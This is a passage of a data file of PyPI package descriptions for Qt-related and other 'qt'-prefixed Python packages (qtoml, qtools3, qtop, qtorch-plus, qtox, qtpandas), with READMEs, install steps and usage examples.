MyPIDLabel('Hello')lbl.show()return {'label': lbl}if __name__ == '__main__':with qt_multiprocessing.MpApplication(initialize_process=create_process_widgets) as app:print(\"Main PID:\", os.getpid())widg = QtWidgets.QDialog()lay = QtWidgets.QFormLayout()widg.setLayout(lay)# Forminp = QtWidgets.QLineEdit()btn = QtWidgets.QPushButton('Set Text')lay.addRow(inp, btn)def set_text():text = inp.text()app.add_var_event('label', 'setText', text)# The label does not exist in this process at all. Can only access by string namesprint('Set Label text', text + '.')# `print_pid` will run in a separate process and print the pid.app.add_var_event('label', 'print_pid')btn.clicked.connect(set_text)widg.show()```## How it worksThis library works by creating an event loop in a separate process while the Qt application is running in the mainprocess. This library is built off of the mp_event_loop library which creates a long running process where events arethrown on a queue and executed in a separate process. The other process that is created also runs it's own Qtapplication while executing events in a timer.This library has the ability to:* dynamic creation of widgets in a separate process* Run methods of widgets in a separate process through variable names* Proxy widgets## Manual ExampleThis example shows how everything comes together manually```pythonimport osimport qt_multiprocessingfrom qtpy import QtWidgetsclass MyPIDLabel(QtWidgets.QLabel):def print_pid(self):text = self.text()print(text, 'PID:', os.getpid())return textdef create_process_widgets():lbl = MyPIDLabel('Hello')lbl.show()return {'label': lbl}if __name__ == '__main__':app = QtWidgets.QApplication([])mp_loop = qt_multiprocessing.AppEventLoop(initialize_process=create_process_widgets)print(\"Main PID:\", os.getpid())widg = QtWidgets.QDialog()lay = QtWidgets.QFormLayout()widg.setLayout(lay)# Forminp = QtWidgets.QLineEdit()btn = QtWidgets.QPushButton('Set Text')lay.addRow(inp, btn)def set_text():text = inp.text()mp_loop.add_var_event('label', 'setText', text)# The label does not exist in this process at all. Can only access by string namesprint('Set Label text', text + '.')# `print_pid` will run in a separate process and print the pid.mp_loop.add_var_event('label', 'print_pid')btn.clicked.connect(set_text)widg.show()# Run the multiprocessing event loopmp_loop.start()# Run the application event loopapp.exec_()# Quit the multiprocessing event loop when the app closesmp_loop.close()```"} +{"package": "qtnanester", "pacakge-description": "No description available on PyPI."} +{"package": "qtneat", "pacakge-description": "qtneatDON'T USE IT. I'M STILL WORKINGSet the Qt frameless titlebar/theme easilyRequirementsPyQt5 >= 5.8Included Packagesqtawesomepyqt-svg-buttonpyqt-svg-icon-text-widgetSetuppython -m pip install qtneatExamplefromPyQt5.QtWidgetsimportQApplicationfrompyqt_timer.settingsDialogimportSettingsDialogfromqtneatimportprepareQtApp,QtAppManagerif__name__==\"__main__\":importsysprepareQtApp()a=QApplication(sys.argv)w=SettingsDialog()m=QtAppManager(w)m.setTheme(theme='#6f478d')m.setTitleBar(icon_filename='settings.svg')m.show()a.exec()Result"} +{"package": "qt_nester", "pacakge-description": "UNKNOWN"} +{"package": "qt_object_viewer", "pacakge-description": "This Python package provides a Qt based widget and a dialog class for exploring a\nnested object structure.For examples see:http://github.com/uweschmitt/qt_object_viewer.git"} +{"package": "qtodotxt", "pacakge-description": "No description available on PyPI."} +{"package": "qtodotxt2", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-cmdline", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-dallastemp", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-eq3bt", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-generic-http", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-modbus", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-mppsolar", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-mqtt", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-paradox", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-pushover", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-pylontech", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-raspigpio", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-rpigpio", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-thingspeak", "pacakge-description": "No description available on PyPI."} +{"package": "qtoggleserver-zigbee2mqtt", "pacakge-description": "No description available on PyPI."} +{"package": "qtoml", "pacakge-description": "qtoml is another Python TOML encoder/decoder. I wrote it because I found\nuiri/toml too unstable, and PyTOML too slow.For information concerning the TOML language, seetoml-lang/toml.qtoml currently supports TOML v0.5.0.Usageqtoml is available onPyPI. You can install\nit using pip:$pipinstallqtomlqtoml supports the standardload/loads/dump/dumpsAPI common to\nmost similar modules. Usage:>>>importqtoml>>>toml_string=\"\"\"...test_value = 7...\"\"\">>>qtoml.loads(toml_string){'test_value': 7}>>>print(qtoml.dumps({'a':4,'b':5.0}))a = 4\nb = 5.0>>>infile=open('filename.toml','r')>>>parsed_structure=qtoml.load(infile)>>>outfile=open('new_filename.toml','w')>>>qtoml.dump(parsed_structure,outfile)TOML supports a fairly complete subset of the Python data model, but notably\ndoes not include a null orNonevalue. If you have a large dictionary from\nsomewhere else includingNonevalues, it can occasionally be useful to\nsubstitute them on encode:>>>print(qtoml.dumps({'none':None}))qtoml.encoder.TOMLEncodeError: TOML cannot encode None>>>print(qtoml.dumps({'none':None},encode_none='None'))none = 'None'Theencode_nonevalue must be a replacement encodable by TOML, such as zero\nor a string.This breaks reversibility of the encoding, by renderingNonevalues\nindistinguishable from literal occurrences of whatever sentinel you chose. Thus,\nit should not be used when exact representations are critical.Development/testingqtoml uses thepoetrytool for project\nmanagement. To check out the project for development, run:$gitclone--recurse-submoduleshttps://github.com/alethiophile/qtoml$cdqtoml$poetryinstallThis assumes poetry is already installed. The package and dependencies will be\ninstalled in the currently active virtualenv if there is one, or a\nproject-specific new one created if not.qtoml is tested against thealethiophile/toml-testtest suite, forked from uiri\u2019s\nfork of the original by BurntSushi. To run the tests, after checking out the\nproject as shown above, enter thetestsdirectory and run:$pytest# if you already had a virtualenv active$poetryrunpytest# if you didn'tLicenseThis project is available under the terms of the MIT license."} +{"package": "qtoolkit", "pacakge-description": "Full Documentation[!WARNING]\n\ud83d\udea7 This repository is still under construction. \ud83d\udea7Need help?Ask questions about QToolKit on theQToolKit support forum.\nIf you've found an issue with QToolKit, please submit a bug report onGitHub Issues.What\u2019s new?Track changes to qtoolkit through thechangelog.ContributingWe greatly appreciate any contributions in the form of a pull request.\nAdditional information on contributing to QToolKit can be foundhere.\nWe maintain a list of all contributorshere.Code of conductHelp us keep QToolKit open and inclusive.\nPlease read and follow ourCode of Conduct.LicenseQToolKit is released under a modified BSD license; the full text can be foundhere.AcknowledgementsQToolKit is developed and maintained by Matgenix SRL.A full list of all contributors can be foundhere."} +{"package": "qtools", "pacakge-description": "Python tools for Qt."} +{"package": "qtools3", "pacakge-description": "qtools3- Questionnaire Tools for ODKThis softwareqtools3provides tools and utilities for dealing with PMA\nquestionnaires. It converts the XLSForms to XML and then does all appropriate\nedits. It also can be used as a simple XLSForm Offline converter.The softwareqtools3is an upgrade fromqtools2. The primary purpose for this\nupgrade is to port the software from Python 2 to Python 3. This was made\npossible because thecommunity's PyXFormadded Python 3 support in 2018.Pre-requisitesThe softwareqtools3relies on Python 3 for core functionality and Java for\nODKValidate. The steps to install areInstall the most recent version of theJava JRE.InstallPython 3.6or higher.Note: the author usesHomebrewfor Python installation on Mac.Windows-specific stepsSome difficulties arise ifpythonandpipare not be added automatically\nto thePATHupon installation. For instructions on how to do this, consultthis document.OpenCMD(click start menu, typeCMD, press enter).cd C:\\Python36\\ScriptsContinue with installation or upgrade...InstallationNOTE: Windows users start with theWindows-specifc stepssection.On a terminal or CMD, runpython3 -m pip install qtools3For the latest and greatest, install directly from githubpython3 -m pip install https://github.com/PMA-2020/qtools3/zipball/masterCommand-line usageBesides being the workhorse ofqtools3, the moduleqtools3.convertalso provides a command-line utility. New-style linking (with all instructions contained inside the XLSForm) is now the default. Old-style linking (line-by-line manual XML editing instructions) is removed. To see help files and usage, run in the terminalpython -m qtools3.convert --helpQuick-start guideType of conversionCommandPMA form conversionpython -m qtools3.convert FILENAME [FILENAME ...]XLSForm-Offline equivalent, convert and validatepython -m qtools3.convert -ril FILENAME [FILENAME ...]OptionsShort FlagLong FlagDescription-r--regularThis flag indicates the program should convert to XForm and not try to enforce PMA-specific naming conventions or make linking checks for HQ and FQ.-p--preexistingInclude this flag to prevent overwriting pre-existing files.-n--novalidateDo not validate XML output with ODK Validate. Do not perform extra checks on (1) data in undefined columns, (2) out of order variable references.-i--ignore_versionIgnore versioning in filename, form_id, form_title, and save_form. In other words, the default (without this flag) is to ensure version consistency.-l--linking_warnProduce warnings for incorrect linking directives. Default is to raise an exception and halt the program.-d--debugShow debug information. Helpful for squashing bugs.-e--extrasPerform extra checks on (1) data in undefined columns and (2) out of order variable references.-s--suffixA suffix to add to the base file name. Cannot start with a hyphen (\"-\").ExtrasTranslation Regex MismatchesTheseqtools3conversion warning messages appear whenever there is a discrepancy between translations with respect to numbering, i.e.'[0-9]+', and/or variables, i.e.'${...}'.Example - Numbering MismatchIn this example, the warning'[0-9]+'will appear, because \"0\" is not the same things as \"zero\". To fix this, please ensure that ALL languages use only arabic numerals (e.g. 1, 2, 3...), or only word-based numbering (e.g. one, two, three...).English: Please enter 0.Bad Pidgin English: Please enter zero.Example - Variable MismatchODK variables should never be translated. If the main language shows \"${months}\", all language translations should also show \"${months}\". Of course, what the user sees on the phone will still be translated.English: Enter ${months}.Bad French: Entrez ${mois}.Example - Variable MismatchTranslations should use all variables that the English uses.English: There are ${hh_count} people in the householdBad Pidgin English: There are (ODK will fill in a count) people in the householdUpdatesNOTE: Windows users start with theWindows-specifc stepssection. To installqtools3updates, usepython3 -m pip install qtools3 --upgradeFor the latest and greatest, replacemasterin the URLs above withdevelop.Every once in a while, it will be necessary to updatepmaxform3. To do this, usepython3 -m pip install pmaxform3 --upgradeSuggestions and GotchasCheck the version in the terminal to see if a program is installed.Check Java version withjavac -versionCheck Python version withpython -V.Check pip version withpip -V.Another executable for Python ispython3.Another executable forpipispip3.The most recent Java is not required, but successful tests have only been run with Java 1.6 through Java 1.8.A dependency ofpmaxformislxml, which can cause problems on Mac. If there are problems, the best guide is onStackOverflow.During installation ofpmaxformon Mac, the user may be prompted to install Xcode's Command Line Tools. This should be enough forlxml.qtools3may run without Java. Java is only needed for ODK Validate, which can be bypassed by using the \"No validate\" option.Xcode 9 presents issues with missing header files. If at all possible, install Xcode 8.QTools2: Outils de questionnaire pour ODKQtools2 fournit des outils et des utilitaires permettant de traiter les questionnaires PMA2020. Il convertit les XLSForms en XML, puis effectue toutes les modifications appropri\u00e9es. Il peut \u00e9galement \u00eatre utilis\u00e9 comme un convertisseur XLSForm Offline simple.Le code est n\u00e9cessairement \u00e9crit pour Python 2 car il d\u00e9pend d'un embranchement du [PyXForm de la communaut\u00e9]1a(l\u2019embranchement s'appelle [pmaxform]1b) pour convertir les documents MS-Excel en XML. Nous devons juste apprendre \u00e0 vivre avec cette contrari\u00e9t\u00e9.Conditions pr\u00e9alablesQTools2 repose sur Python 2 pour les fonctionnalit\u00e9s principales et Java pour ODKValidate. Les \u00e9tapes pour installer sontInstallez la version la plus r\u00e9cente de [Java]2(actuellement 1.8). ~~ Le JRE ou le JDK devrait fonctionner. ~ Seul le JDK fonctionnait lors du dernier test sur Mac (mars 2017).Installez [Python 2.7]3.Remarque: l'auteur utilise [Homebrew]4pour l'installation de Python sur Mac.Windows-specific stepsSome difficulties arise ifpythonandpipare not be added automatically to thePATHupon installation. OpenCMD(click start menu, typeCMD, press enter). Naviagate to yourpipexecutable, probably here:cd C:\\Python27\\ScriptsContinue with installation or upgrade...InstallationNOTE: Windows users start with theWindows-specifc stepssection. This package uses a modified version ofpyxformcalledpmaxformbecause the PyXForm project thus far has refused to accept this author's pull requests for some simple improvements. Therefore, installation requirestwocommands instead ofone. Open CMD or Terminal and install relevant packagesseparately, andin orderFirst,pip install https://github.com/jkpr/pmaxform/zipball/masterSecond,pip install https://github.com/jkpr/QTools2/zipball/masterFor the latest and greatest, replacemasterin the URLs above withdevelop.\u00e9tapes sp\u00e9cifiques \u00e0 WindowsCertaines difficult\u00e9s surviennent sipythonetpipne sont pas ajout\u00e9s automatiquement auPATHlors de l'installation. OuvrezCMD(cliquez sur le menu de d\u00e9marrage, tapezCMD, appuyez sur Entr\u00e9e).Acc\u00e9dez \u00e0 votre ex\u00e9cutablepip, probablement ici:cd C: \\ Python27 \\ ScriptsContinuer l'installation ou la mise \u00e0 niveau ...InstallationREMARQUE: les utilisateurs de Windows commencent par la sectionEtapes Sp\u00e9cifiques Windows. Ce package utilise une version modifi\u00e9e depyxformappel\u00e9epmaxformcar le projet PyXForm a jusqu'\u00e0 pr\u00e9sent refus\u00e9 d'accepter les demandes d'extraction de cet auteur pour certaines am\u00e9liorations simples. Par cons\u00e9quent, l'installation n\u00e9cessitedeuxcommandes au lieu d\u2019une. Ouvrez CMD ou Terminal et installez les packages pertinentss\u00e9par\u00e9mentetdans l'ordrePremi\u00e8rementpip installer https://github.com/jkpr/pmaxform/zipball/masterDeuxi\u00e8mementpip installer https://github.com/jkpr/QTools2/zipball/masterPour les plus r\u00e9cents et les meilleurs, remplacez \u00abmaster\u00bb dans les URL ci-dessus par \u00abdeveloper\u00bb.UsageApr\u00e8s l'installation, le code capable de convertir des XLSForms est enregistr\u00e9 dans la biblioth\u00e8que de codes de Python. Cela signifie que n'importe o\u00f9 on peut acc\u00e9der \u00e0 Python, ains qu\u2019aqtools2.Pour utiliserqtools2, il y a deux mani\u00e8res principales. La m\u00e9thode la plus simple consiste \u00e0 pointer et \u00e0 cliquer sur un fichier sp\u00e9cifique ([exemple de fichier sp\u00e9cifique]5) enregistr\u00e9 dans n\u2019importe quel dossier, tel que Downloads, pour que Python puisse l\u2019ex\u00e9cuter. L'autre fa\u00e7on consiste \u00e0 utiliser la ligne de commande.Meilleure mani\u00e8re d'utiliserqtools2pour les formulaires PMA2020Le moyen le plus simple d'utiliserqtools2est d'utiliser un fichier du dossierscripts[de ce r\u00e9f\u00e9rentiel]6. Pour t\u00e9l\u00e9charger un script, cliquez sur son lien, puis sur \"Raw\", puis enregistrez le contenu (dans le navigateur, File> Save). Le tableau ci-dessous explique ce qui est disponible.Nom du scriptButxlsform-convert.pyConvertir un ou plusieurstypesde XLSForm avec une interface graphique.Windows associe g\u00e9n\u00e9ralement les fichiers.py\u00e0 l'ex\u00e9cutable Python. Ainsi, un utilisateur Windows ne devrait avoir besoin que de double-clic sur l'ic\u00f4ne du fichier de script. Cela d\u00e9marre l\u2019interpr\u00e9tre Python et lance le code.\n\u00a0\nSur un Mac, faire un double-clic sur un fichier.pyouvre g\u00e9n\u00e9ralement un correcteur de texte. Pour ex\u00e9cuter le fichier en tant que code, faire un clic droit sur l'ic\u00f4ne du fichier de script, puis s\u00e9lectionnez \"Ouvrir avec> Python Launcher (2.7.12)\". Le num\u00e9ro de version Python peut \u00eatre diff\u00e9rent.AlternativeSi ce qui pr\u00e9c\u00e8de est trop difficile, il est possible d\u2019obtenir la m\u00eame fonctionnalit\u00e9 d\u2019une mani\u00e8re diff\u00e9rente. Ouvrez une session interactive Python (peut-\u00eatre ouvrir IDLE, peut-\u00eatre ouvrir Terminal et taperpython). Ensuite, copiez et collez le m\u00eame texte qui se trouve dans le script souhait\u00e9 dans l'interpr\u00e8te, appuyez sur \"Enter\", et le tour est jou\u00e9.Utilisation de la ligne de commandeEn plus d'\u00eatre le bourreau du travail deqtools2, le moduleqtools2.convertfournit \u00e9galement un utilitaire de ligne de commande. La liaison de style nouveau (avec toutes les instructions contenues dans le XLSForm) est maintenant la valeur par d\u00e9faut. La liaison de type ancien (instructions d\u2019\u00e9dition XML manuelle, ligne par ligne) est supprim\u00e9e. Pour voir les fichiers d\u2019aide et leur utilisation, ex\u00e9cutez-le dans le terminal.python -m qtools2.convert --helpGuide de d\u00e9marrage rapideType de conversionCommandeConversion de formulaire PMApython -m qtools2.convert FILENAME [FILENAME ...]convertir et valider des \u00e9quivalents de XLSForm-Offline,python -m qtools2.convert -ril FILENAME [FILENAME ...]OptionsDrapeau courtDrapeau longDescription-r--regularCet indicateur indique que le programme doit convertir en XForm et ne pas essayer d\u2019apporter des modifications sp\u00e9cifiques \u00e0 PMA2020.-p--preexistingIncluez cet indicateur (drapeau) pour emp\u00eacher le remplacement de fichiers pr\u00e9existants.-n--novalidateNe validez pas la sortie XML avec ODK Validate. N'effectuez pas de contr\u00f4les suppl\u00e9mentaires sur (1) les donn\u00e9es de colonnes ind\u00e9finies, (2) les r\u00e9f\u00e9rences de variables en d\u00e9sordre.-i--ignore_versionIgnorez le versioning dans filename, form_id, form_title et save_form. En d'autres termes, ceci permet par d\u00e9faut d'assurer la coh\u00e9rence de la version.-l--linking_warnProduire des avertissements pour les directives de liaison incorrectes. Par d\u00e9faut, une exception est d\u00e9clench\u00e9e et le programme est arr\u00eat\u00e9.-d--debugAfficher les informations de d\u00e9boggage. Utiliser pour \u00e9craser les bugs.-e--extrasEffectuez des v\u00e9rifications suppl\u00e9mentaires sur (1) les donn\u00e9es dans des colonnes non d\u00e9finies et (2) les r\u00e9f\u00e9rences de variables en d\u00e9sordre.-s--suffixUn suffixe \u00e0 ajouter au nom du fichier de base. Impossible de commencer par un trait d'union (\"-\").Interface utilisateur graphiquePour ceux qui souhaitent utiliser une interface graphique lanc\u00e9e \u00e0 partir de la ligne de commande., Le pipeline QTools2 commence ainsipython -m qtools2et v\u00e9rifiez l\u2019utilisation en ajoutant l\u2019indicateur--help\u00e0 la commande ci-dessus.NOTE: l'option-v2a \u00e9t\u00e9 supprim\u00e9e \u00e0 partir de la version 0.2.3.Mises \u00e0 jourREMARQUE: les utilisateurs de Windows commencent par la section _ ** Etapes sp\u00e9cifiques Windows ** _. Pour installer les mises \u00e0 jourqtools2, utilisezpip installer https://github.com/jkpr/QTools2/zipball/master --upgradePour les plus r\u00e9centes et les meilleures, remplacez \u00abmaster dans les URL ci-dessus par \u00abdeveloper\u00bb.Suggestions et pi\u00e8gesV\u00e9rifiez la version dans le terminal pour voir si un programme est install\u00e9.V\u00e9rifier la version de Java avecjavac -versionV\u00e9rifiez la version de Python avecpython -V.V\u00e9rifiez la version de pip avecpip -V.Un autre ex\u00e9cutable pour Python estpython2.Un autre ex\u00e9cutable pourpipestpip2.La version la plus r\u00e9cente de Java n'est pas requise, mais les tests r\u00e9ussis ont uniquement \u00e9t\u00e9 ex\u00e9cut\u00e9s avec Java 1.6 \u00e0 Java 1.8.Une d\u00e9pendance depmaxformestlxml, ce qui peut poser probl\u00e8me sur Mac. S'il y a des probl\u00e8mes, le meilleur guide est sur [StackOverflow]8.Lors de l'installation depmaxformsur Mac, l'utilisateur peut \u00eatre invit\u00e9 \u00e0 installer les outils de ligne de commande de Xcode. Cela devrait suffire pourlxml.Qtools2 peut fonctionner sans Java. Java n\u2019est n\u00e9cessaire que pour ODK Validate, qui peut \u00eatre contourn\u00e9 en utilisant l\u2019option \"No validate\".BugsSoumettez les rapports de bugs \u00e0 James Pringle \u00e0 l'adressejpringleBEAR @ jhu.edu."} +{"package": "qtooth", "pacakge-description": "No description available on PyPI."} +{"package": "qtop", "pacakge-description": "qtop: the fast text mode way to monitor your cluster\u2019s utilization and\nstatus; the time has come to take back control of your cluster\u2019s\nscheduling businessPython port by Sotiris Fragkiskos / Original bash version by Fotis\nGeorgatosSummaryExampleqtop.py is the python rewrite of qtop, a tool to monitor Torque, PBS,\nOAR or SGE clusters, etc. This release provides for theinstant replayfeature, which is handy for debugging scheduling mishaps as they occur.\nqtop is and will remain a work-in-progress project; it is intended to\nbe built upon and extended - please come along ;)This is an initial release of the source code, and work continues to\nmake it better. We hope to build an active open source community that\ndrives the future of this tool, both by providing feedback and by\nactively contributing to the source code.This program is currently in pre-release mode, with experimental features. If it works, peace :)InstallationTo install qtop, you can either dogit clone https://github.com/qtop/qtop.git\ncd qtop\n./qtop --versionorpip install qtop --user ## run it without --user to install it as root\n$HOME/.local/bin/qtop --versionUsageTo run a demo, just run./qtop -b demo -FGTw ## show demo, -F for full node names, -T to transpose the matrix, -G for full GECOS field, and -w for watch modeOtherwise, for daily usage you can run./qtop -b sge -FGw ## replace sge with pbs or oar, depending on your setup (this is often picked up automagically)Try--helpfor all available options.DocumentationDocumentation/tutorialhere.ProfileDescription: the fast text mode way to monitor your cluster\u2019s utilization and status; the time has come to take back control of your cluster\u2019s scheduling business\nLicense: MIT\nVersion: 0.9.20161222 / Date: 2016-12-22\nHomepage: https://github.com/qtop/qtop"} +{"package": "qtopic", "pacakge-description": "qtopicA Python module to fetch and parse data Topic related data from Quora.InstallationInstall using pip:pip install qtopicUsagefrom qtopic import QTopicbest_questions = QTopic.get_best_questions (\u2018Computer-Programming\u2019)#do stuff with the parsed databest_questions[\u2018links\u2019]best_questions[\u2018title\u2019]best_questions[\u2018published\u2019]FeaturesCurrently implementedFollower CountSome followers nameRelated TopicsFeed last updatedBest questionsTop Storiesbreaked down links, title, published.Open questionbreaked down links, title, published.TodoInformation to be stored in a better way."} +{"package": "qtorch", "pacakge-description": "No description available on PyPI."} +{"package": "qtorch-plus", "pacakge-description": "QPytorch+: Extending Qpytorch for Posit format and moreAuthor: minhhn2910@github, himeshi@githubInstallInstall in developer mode:gitclonehttps://github.com/minhhn2910/QPyTorch.gitcdQPyTorch\npipinstall-e./Simple test if c-extension is working correctly :python test.pyImportant: if there are errors when running test.py, please export the environment variables indicating build directory and/or CUDA_HOME, otherwise we will have permission problem in multi-user-server.export TORCH_EXTENSIONS_DIR=/[your-home-folder]/torch_extension\nexport CUDA_HOME=/[your cuda instalation directory e.g. /usr/local/cuda-10.2] \npython test.pyFunctionality:SupportPosit Formatwith round to nearest mode.Scaling of value before & after conversion to/from posit is supported (Exponent bias when the scale is a power of 2).For example:value x -> x*scale -> Posit(x*scale) -> xSupport Tanh approximation with Posit and correction of error:Whenxis in a posit format with es = 0 =>Sigmoid(x) = (x XOR 0x8000) >> 2 => PositTanh(x) = 2 \u00b7 Sigmoid(2x) \u2212 1More number formats (Table lookup, log2 system ..., and new rounding modes will be supported on new versions).Currently under development and update to support more number formats and schemes.Demo and tutorial:Approximate Tanh Function with Posit is presented atexamples/tutorial/test_posit_func.ipynbMost functionalities can be tested by using the notebooks in posit tutorials: ./examples/tutorial/Notebook demo training Cifar10 with vanilla Posit 8 bit:examples/tutorial/CIFAR10_Posit_Training_Example.ipynbDemo of DCGAN Cifar10 training with Posit 8 bit:Google Colab LinkDemo of DCGAN Lsun inference using Posit 6 bit and Approximate Tanh :Google Colab LinkDemo of applying posit 6 bits & 8 bits toALBERTfor Question Answering Task:GoogleColab DemoIf you find this repo useful, please cite our paper(s) listed below. The below also explain the terms and usage of Posit's enhancements (exponent bias and tanh function).@inproceedings{ho2021posit,\n title={Posit Arithmetic for the Training and Deployment of Generative Adversarial Networks},\n author={Ho, Nhut-Minh and Nguyen, Duy-Thanh and De Silva, Himeshi and Gustafson, John L and Wong, Weng-Fai and Chang, Ik Joon},\n booktitle={2021 Design, Automation \\& Test in Europe Conference \\& Exhibition (DATE)},\n pages={1350--1355},\n year={2021},\n organization={IEEE}\n}The original Qpytorch package which supports floating point and fixed point:The original README file is in REAME.original.mdCredit to the Qpytorch team and their original publication@misc{zhang2019qpytorch,\n title={QPyTorch: A Low-Precision Arithmetic Simulation Framework},\n author={Tianyi Zhang and Zhiqiu Lin and Guandao Yang and Christopher De Sa},\n year={2019},\n eprint={1910.04540},\n archivePrefix={arXiv},\n primaryClass={cs.LG}\n}Qpytorch TeamTianyi ZhangZhiqiu LinGuandao YangChristopher De Sa"} +{"package": "qtorch-posit", "pacakge-description": "Extended version of QPytorchAuthor: minhhn2910@github, himeshi@githubMigration and change of package nameWe have developed multiple new funcionalities and have published the updated version under the new name: qtoch-plus.The new version supports arbitrary number of bit for posit (instead of only 16,8,6,4 bitwidth are supported in this version). We also support crafting customized number format with no restriction on the number of bit and the generating rules. More details on our github and in the new pip page:https://pypi.org/project/qtorch-positThis is developed based on the original QPyTorch package. The below is the original README file and acknowlegementOriginal Qpytorch:Original QPyTorch teamTianyi ZhangZhiqiu LinGuandao YangChristopher De Sa"} +{"package": "qtox", "pacakge-description": "qtoxcreates Bash scripts that simply run the same commands Tox would run but in parallel for each environment.This can lead to a massive speed-up in your daily local workflow.BenchmarksI cloned theFalcon web API framework, rantoxonce, and commented out the scripttools/clean.sh(which error\u2019d out when the unit tests for Python 27 and 36 were run in parallel).Following that, here\u2019s the output oftime toxtook:real 1m9.746s\nuser 1m18.527s\nsys 0m4.732sI then created a bash script usingqtox-epep8 py27 py36 docs > retox.sh. Here\u2019s the output oftime ./retox.sh:real 0m40.326s\nuser 1m28.318s\nsys 0m3.717sSoqtox\u2019s script ran in 57% the time.Installingqtoxis available on PyPi.If you usepipsiyou can install it with:pipsi install qtoxIf you\u2019re some kind of crazy person who likes polluting your global Python instance you can just callpip install qtoxand I\u2019ll try not to judge you.NoteThe version of tail on OSX doesn\u2019t have the--pidoption, so you\u2019ll need to install it withbrew install coreutils. Scripts generated on osx callgtailinstead oftailfor this reason.Why you shouldn\u2019t call Tox from your dev boxTox is great for making sure tests run a truly isolated environment on a CI platform, but if you\u2019re just trying to run flake8 or the unit tests for the hundredth time today it can be overkill.Tox appears to do a lot of house work before running even the simplest commands. Anecdotally, I\u2019ve always noticed a huge speed improvement when I simply ran a command in the virtualenv tox set up (say,.tox/py27/bin/pytest mypkg) versus when I invoked Tox directly (tox-epy27).The speed savings were significant enough that I ended up writing Bash scripts to run the Tox commands and used that instead of Tox, which always ended up being faster according totime. On the downside, these scripts obviously duplicated information already found in thetox.inifile and often became out of date.The rise of truly amazing static analysis tools in Python such asMyPyexacerbate the problems I see running invoking Tox compared to manually crafting scripts. Tools like MyPy offer the most value when they\u2019re run continuously as development happens. However, because MyPy checks are often put in separate tox environment, it\u2019s easy for people focused on a different problem (say, fixing a unit test) to run only those environments for minutes or hours before they remember to check MyPy, and be left needing to fix a bunch of type errors after they\u2019re convinced they\u2019ve already made their program work at runtime.The best solution is to just run everything as often as possible.qtoxenables this.How to use qtoxImagine a tox file that:formats your code withBlackchecks it withFlake8checks it with MyPyruns unit tests in Python 3.5 and 3.6Note: tox needs to run one time beforeqtoxcan be used, in order for qtox to determine if command line tools are present in the virtualenv\u2019s or if they should be checked for in the Tox\u2019swhitelist_externalssetting.qtoxdoesn\u2019t replace Tox, it just lets you augment it with the ability to re-run it\u2019s commands faster.qtoxcan be used to create a bash script like so:qtox-eblackpep8mypypy35p36>retox.shchmod+xretox.shWhen this script will instantly launch five jobs in parallel and wait on the results in the order you specified (meaning you want the quicker jobs- such as black or flake8- to run first).As it works it\u2019s way through the list, it shows the output of each job in real time. So in this example, blacks output would be seen as it happens, and when black finishes all of flake8\u2019s output that happened in the interim will be shown before it\u2019s current output is displayed, etc.It does this by having every job redirect to a file. When it\u2019s time to consume the results of that job,tailis invoked in another job, which reads from the start of the file and follows it until the process writing to it dies.If a job fails, all other subsequent jobs are simply killed without printing out their output. This keeps things simpler so you don\u2019t have to scroll back up to see what went wrong.It\u2019s up to you to make sure the simpler jobs are put earlier in the list you give toqtox. If you instead put the longer running jobs first, you\u2019ll have to wait for them to finish before seeing feedback from quicker tools such as flake8.Multi Tox Super Projectsqtoxalso supports creating bash scripts for multiple tox projects.Use the-cflag to specify a tox directory, then use-elike normal.Say you have two directories containing two Python projects, both using tox. One is calledacme-lib, and is a reusable library containing core business logic, while the other isacme-rest-api, which usesacme-lib. If you\u2019re working on both at the same time, you may want to simply run all of the Tox tests together, starting with Flake 8 and MyPy tests first.Generating a bash script for that would look something like this:qtox-cacme-lib-epep8mypy-cacme-rest-api-epep8mypy-cacme-lib-epytest-cacme-rest-api-epytest>retox.shchmod+x./retox.shThe tasks that will be waited on / shown the progress for will be in this order:acme-lib\u2019s pep8 and mypy checksacme-rest-api\u2019s pep8 and mypy checksacme-lib\u2019s pytest testsacme-rest-api\u2019s pytest testsTo beat a dead horse, I\u2019ll reiterate that all of these tasks will start simultaneously, meaning the relatively expensive REST API unit tests will start running at the same time as everything else. The simpler checks will simply be waited on first."} +{"package": "qtp", "pacakge-description": "No description available on PyPI."} +{"package": "qtpad", "pacakge-description": "No description available on PyPI."} +{"package": "qtpandas", "pacakge-description": "library for Python) with Qt.Home-page: https://github.com/draperjames/qtpandasAuthor: Matthias Ludwig, Marcel Radischat, Zeke, James DraperAuthor-email: james.draper@duke.eduLicense: MIT LicenseDescription: # QtPandas### Utilities to use [pandas](https://github.com/pandas-dev/pandas) (the data analysis/manipulation library for Python) with Qt.## Project Information
Latest Release\"latest
Package Status\"status\"
Build Status\"travis
PyPI\"pypi
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/795dad8f6dfd4697ab8474265c4d47cb)](https://www.codacy.com/app/james-draper/qtpandas?utm_source=github.com&utm_medium=referral&utm_content=draperjames/qtpandas&utm_campaign=Badge_Grade)[![Join the chat at https://gitter.im/qtpandas/Lobby#](https://badges.gitter.im/qtpandas/lobby.svg)](https://gitter.im/qtpandas/Lobby#)[![open issues](https://img.shields.io/github/issues-raw/draperjames/qtpandas.svg)](https://github.com/draperjames/qtpandas/issues)[![closed issues](https://img.shields.io/github/issues-closed/draperjames/qtpandas.svg)](https://github.com/draperjames/qtpandas/issues)## Requirements;> Python 3.4 or greater> Pthon 2.7 or greater> PyQt4## InstallTo install run the following in the command prompt;```pip install qtpandas```If that doesn't work try installing the lastest version of easy gui;```pip install --upgrade git+https://github.com/robertlugg/easygui.git```If that doesn't work then please [report an issue](https://github.com/draperjames/qtpandas/issues)To use, create a new Python script containing the following:```from PyQt4.QtCore import *from PyQt4.QtGui import *from qtpandas.views.CSVDialogs import CSVImportDialogif __name__ == \"__main__\":from sys import argv, exitapp = 